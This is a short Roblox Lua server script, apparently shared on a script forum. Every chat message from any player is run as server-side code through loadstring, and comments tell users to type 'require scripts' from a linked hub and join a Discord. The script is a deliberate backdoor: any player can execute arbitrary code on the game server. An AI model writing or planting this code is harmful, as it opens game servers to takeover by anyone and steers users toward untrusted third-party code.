-- run the requirescript you want in chat just type it lol i scripted it so it will run -- where to get require scripts https://requirehub.pythonanywhere.com/ -- new discord https://discord.gg/2TWub4WsCe -- how i did it local Players = game:GetService("Players") Players.PlayerAdded:Connect(function(player) player.Chatted:Connect(function(message) local func, errorMessage = loadstring(message) if func then local success, error = pcall(func) if not success then warn("Error during execution: " .. error) end else warn("Invalid Lua code: " .. errorMessage) end end) end)